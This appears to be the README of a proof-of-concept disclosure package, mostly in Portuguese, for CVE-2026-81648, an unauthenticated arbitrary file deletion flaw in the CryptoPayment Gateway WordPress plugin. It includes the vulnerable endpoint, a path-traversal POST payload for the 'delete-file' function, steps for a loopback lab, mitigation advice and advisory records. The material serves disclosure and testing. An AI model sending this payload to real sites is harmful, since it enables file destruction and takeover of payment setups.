
Prova de conceito de exploit e laboratório para CVE-2026-81648, uma falha de exclusão arbitrária de arquivos sem autenticação no plugin CryptoPayment Gateway do WordPress.
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-81648
WordPress — CryptoPayment Gateway 1.2.2 — Granwill
O plugin WordPress CryptoPayment Gateway da versão 1.2.1 à 1.2.2 não aplica uma verificação de autorização em um de seus endpoints AJAX, permitindo que usuários não autenticados invoquem operações administrativas, incluindo a exclusão de arquivos arbitrários no servidor, a sobrescrita da configuração do gateway de pagamento e a recuperação de credenciais de carteira armazenadas em texto claro.
| CVE | CVE-2026-81648 · CVE.org |
| CWE | CWE-862 |
| CVSS | Crítico: 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Produto | WordPress — CryptoPayment Gateway |
| Afetado | 1.2.1–1.2.2 |
| Corrigido | sem patch público (WPScan: nenhuma correção conhecida) |
| Autenticação | nenhuma (ver mapa do código-fonte) |
| Licença | GNU Affero GPL v3.0 |
| Lab | apenas 127.0.0.1 · pacote de divulgação para fornecedor/cliente, não é um scanner |
delete-file em cryptd/ajax.php é o sink. O HTTP é esse arquivo PHP, não o admin-ajax.php.
POST/wp-content/plugins/cryptopayment-gateway/vendor/cryptd/ajax.phpGET /wp-content/poc81648/index.php expect POCWitness81648POST ajax.php data={"function":"delete-file","file_name":"../../../../../poc81648/index.php","folder":""}crpay_file_delete unlinks wp-content/poc81648/index.phpGET witness URL no POCWitness81648POCWitness81648 presente antes do POST, ausente depois. JSON de sucesso sem a exclusão não é isso.
Faça isto primeiro: Não há patch público. Desative o CryptoPayment Gateway ou bloqueie vendor/cryptd/ajax.php até que exista uma versão do fornecedor.
Verifique após a atualização
CVE-2026-81648-Abraxas-Labs.py contra a build corrigida: a testemunha mapeada não deve aparecer.Se você não puder atualizar imediatamente
Alvo apenas http://127.0.0.1:8088 (ou o loopback que você vinculou). Não aponte este script para a internet.
python3 CVE-2026-81648-Abraxas-Labs.py
Sucesso é a testemunha acima no corpo da resposta. Um HTML 200 genérico não é isso.
Stack de loopback usada para reproduzir. Imagens oficiais, a menos que um Dockerfile nesta pasta faça build a partir do código-fonte.
cd lab
docker compose up --force-recreate
Vincule a árvore do produto vulnerável ao lado do Compose se o YAML montar um diretório local (zip do plugin / tag de código-fonte da tabela de versões). Não publique nada exceto 127.0.0.1.
wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898
Diretório de plugins: cryptopayment-gateway
Navegador Trac: plugins.trac.wordpress.org/cryptopayment-gateway
Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null
# CVE-2026-81648 (structured records)
- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-81648`
- CWE: CWE-862
- published: 2026-09-13T21:17:01.930
## NVD description
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.
## MITRE description
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.
## Affected
- Unknown CryptoPayment Gateway 1.2.1 affected
## References (JSON sources only)
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
- https://github.com/advisories/GHSA-9r3q-6qw8-8pm7
- https://nvd.nist.gov/vuln/detail/CVE-2026-81648
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898
## GitHub advisory
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization...
The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.
Este pacote de divulgação é licenciado sob a GNU Affero General Public License v3.0. Consulte LICENSE.
Este pacote é destinado ao fornecedor, ao proprietário do site e a labs licenciados. O script se comunica com 127.0.0.1. Usá-lo contra sistemas que você não possui não é autorizado pela Abraxas Labs. Sem garantias.